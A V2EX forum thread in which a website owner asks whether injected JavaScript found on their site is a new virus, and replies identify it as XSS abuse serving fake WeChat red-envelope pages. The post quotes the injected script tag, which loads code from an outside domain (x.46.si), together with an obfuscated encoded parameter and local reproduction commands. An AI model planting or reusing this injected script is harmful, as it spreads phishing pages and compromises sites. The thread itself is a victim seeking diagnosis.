这段 js 是什么新型病毒吗

1、vi x46si.html > '<meta charset="UTF-8"><title></title><script src="//x.46.si"></script>'

2、php -S 0.0.0.0:8899

3、http://0.0.0.0:8899/x46si.html?ifuoySfVvFScEGZgN4EzM7JSYwBnI6IiMmlDNyQmMhBTY5YaY2kjZxcjNaEGOiVjN4UWZ2YaNxMGNiwiIuFWblJiOiMHzvdnIsICdl1GcsFGdllERiojIaADOiwiI0lHclJiOioWdtBnIsIyZfVXzkJiOxkaM5MjNsIyZf5WYtVmI6IycoFmclJCLiAXdahmI6Qnc1VGLiQWY0FmI6Qnc1VWfgN4EzMPdwBFml

最近网站被注入了一段如上的 html,起初访问这个链接显示的是一个领红包的页面。目前的提示是内容被删除。
第 3 步同一个域名只能被访问一次，第二次访问浏览器会有如下提示。需要换一个域名才能访问，不知道这段 js 在背后做了些什么。

127.0.0.1 未发送任何数据。
ERR_EMPTY_RESPONSE

flowfire

2019-08-12 18:16:47 +08:00

第一句是把 x46si.html 这个文件的内容替换为后面的 html，里面有个 js 脚本，也就是 x.46.si ，这个域名下的脚本是最后执行的内容

第二句是启动一个 php server，

第三句大概是访问你刚启动的服务器把。。。

xiaogouxo

2019-08-12 22:03:12 +08:00

xss 利用，在微信里显示假红包等页面，保护他们自己的域名不被腾讯见红，反解过，要传一段加密参数才能正常工作，不然都显示已删除字样

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/591250

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.